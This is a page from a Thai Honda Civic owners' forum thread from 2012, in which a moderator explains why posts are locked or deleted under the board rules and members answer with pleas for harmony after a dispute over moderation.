ถ้าแบนเค้า ไม่มีเหตุผล เดี๋ยวโดนกล่าวหา "เป็นมาเฟีย" คุณมาช่วยผมแก้ต่างป่าวคับ

แล้วที่ทางผู้ดูแลลงไว้ว่ามีความผิด ก็เพราะจะได้ตามทุก Reply ของ User นั้นได้ครับ ชี้แจงมา ณ ที่่นี้เลย

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

กรณีที่สอง ที่สอบถามอะสอบถามผมเอง ที่แชทมา ซึ่งก็ถูก หลังจากตอบว่า

"ทางผู้ดูแลลงไว้ว่ามีความผิด ก็เพราะจะได้ตามทุก Reply ของ User นั้นได้ครับ" ก็เป็นแบบนี้จริงๆ หลังจากนั้นก็ไม่มีข้อความอะไรมาอีก

การล็อกกระทู้ ลบ กระทู้ เกิดจากการพิจารณาของผู้ดูแล ที่ทางพวกคุณเรียกว่า "มาเฟีย"

โดยถือกฏการพิจารณา กฎกติกามารยาทในการใช้บอร์ด ซึ่งลงไว้เมื่อปี 2008

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

ผมเองก็ตามกระทู้ ตาม Reply ตลอด น้อยครั้งมาก ไม่ถึงหนึ่งเปอร์เซนต์ด้วยซ้ำที่จะลบ หรือ ล็อก เพราะเป็นที่สาธารณะ เป็นสิทธิของทุกคน

แก้ไขล่าสุดโดย เมื่อ พุธ, 1 สิงหา 2012 08:45, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
tochi229

ชื่อเล่น: ปิ๊ป

เข้าร่วม: 28 พฤศจิกา 2010
ตอบ: 7524

Moderator
Moderator

ได้รับคำขอบคุณ: 8264
ให้คำขอบคุณ: 11555

พุธ, 1 สิงหา 2012 08:30 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
K_series พิมพ์ว่า:
ฝากไปถึงบุคคลเบื้องหลังทั้งหลายไปเลยก้อแล้วกัน

ถ้าไม่พอใจในระบบที่เป็นอยู่ปัจจุบัน

ในรอบการเลือกตั้งประธานคลับครั้งต่อไปช่วยมาลงสมัครกันเยอะๆนะครับ

แล้วมาลองดูเอาเองว่าทำงานกันยังไง แล้วจะทำได้มั้ย

พรรคพวกผมที่ชอบอวยกันเองอยู่เนี่ย จะได้ขอกลับไปเป็นสมาชิกธรรมดาๆบ้าง

ว่างก้อไปมีตติ้ง ไม่ว่างก้อไม่ไป ถ้าจัดไกลๆหน่อยขี้เกียจไปจะมีตติ้งกันเองแถวบ้านนี่แหละ

แบบนั้นสบายดีครับผมชอบ

ทำงานเพื่อสังคมก็เป็นแบบนี้แหละครับ มีทั้งคนพอใจและไม่พอใจ
ยังไงจะเป็นกำลังใจให้นะครับ  จุ๊บๆๆ
ได้รับคำขอบคุณจาก: K_series  koobe  tokykung  hacker  wut-chiangmai  boyboom_16  PAE KUNG  honeybeex7  ICE@WIN  sukhothai  ekdanai  hikaru_kung  taguunzae  NaiTEE  carrimoroll 
K_series

ครอบครัว ES
ครอบครัว ES

พุธ, 1 สิงหา 2012 08:36 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อย่าโพสแบบนี้เลยครับ เดี๋ยวเค้าจะว่ามาทำให้คนอื่นเห็นใจ - -
ได้รับคำขอบคุณจาก: hacker  wut-chiangmai  PAE KUNG  NeaT ES.  ekdanai  hikaru_kung  taguunzae  nayyai1  carrimoroll  tochi229 
DuuI

ชื่อเล่น: ดุ่ย

เข้าร่วม: 02 สิงหา 2011
ตอบ: 1128

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 1536

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 1 สิงหา 2012 08:49 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
เห็นแล้วเศร้า อยากให้บ้านเราอบอุ่นและรักกันมาก ๆ 

กลับมาเป็นเหมือนเดิมเร็วๆ นะที่รัก "civicesgroup

ได้รับคำขอบคุณจาก: wut-chiangmai  K_series  Turngkung P 11  taguunzae  nayyai1 
pja

เข้าร่วม: 21 มีนา 2011
ตอบ: 934

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 707
ให้คำขอบคุณ: 973

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 1 สิงหา 2012 09:10 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
นั่นสิคับ อย่าทะเลาะกันเลย 
ได้รับคำขอบคุณจาก: K_series  taguunzae 
akawut

ชื่อเล่น: เชน

เข้าร่วม: 07 สิงหา 2009
ตอบ: 848

Guru ES
Guru ES

ได้รับคำขอบคุณ: 989
ให้คำขอบคุณ: 698

พุธ, 1 สิงหา 2012 09:11 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
เฮ้อ ต่างคนต่างคิด ทุกครั้งที่จะให้ความคิดของตัวเองชนะ ก้อหยุดพักเพื่อรับฟังเรื่องไร้สาระซะบ้าง
ทุกคนก้อมีทั้งดีและไม่ดีกันทั้งนั้น อย่าให้ความคิดที่แตกต่างในตัวเองแค่เรื่องเดียว มาทำลายมิตรภาพอันยั่งยืนเลยครับ
แรกเริ่มทุกท่านในที่นี้ก้อมาจากต่างที่ต่างภาษากันทั้งนั้น และก้อมารักและสามัคคีกันได้เพราะเวบเวบนี้ แต่สุดท้ายจะจบแล้วแตกแยกเพราะเวบเวบนี้เหรอครับ
ขอกันละครับ ผมอยากให้เวบนี้น่าอยู่เพราะผมยังอยากได้ความรู้และมิตรภาพจากทุกท่านในที่นี้อีกเยอะ รักกันไว้เถอะครับ

ผิดพลาดอะไรผมขออภัยเป็นอย่างสูงไว้ด้วยครับ
ได้รับคำขอบคุณจาก: koobe  oat99  wut-chiangmai  K_series  Nung_Sodapop  PAE KUNG  Turngkung P 11  taguunzae 
sayarm

ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

พุธ, 1 สิงหา 2012 09:16 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
เก็บข้อมูล  555
อ่านเพลิน
ได้รับคำขอบคุณจาก: koobe  wut-chiangmai 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 1 สิงหา 2012 09:35 - รบกวนผู้ดูแล ช่วยตรวจสอบ Log in GooGrien ค่ะ
อืม นานๆทีมีเรื่องให้หัวใจมันเต้นรัวๆซะบ้าง อ้าว ผิดกระทู้อีกแล้ว
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 3 จาก 6
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.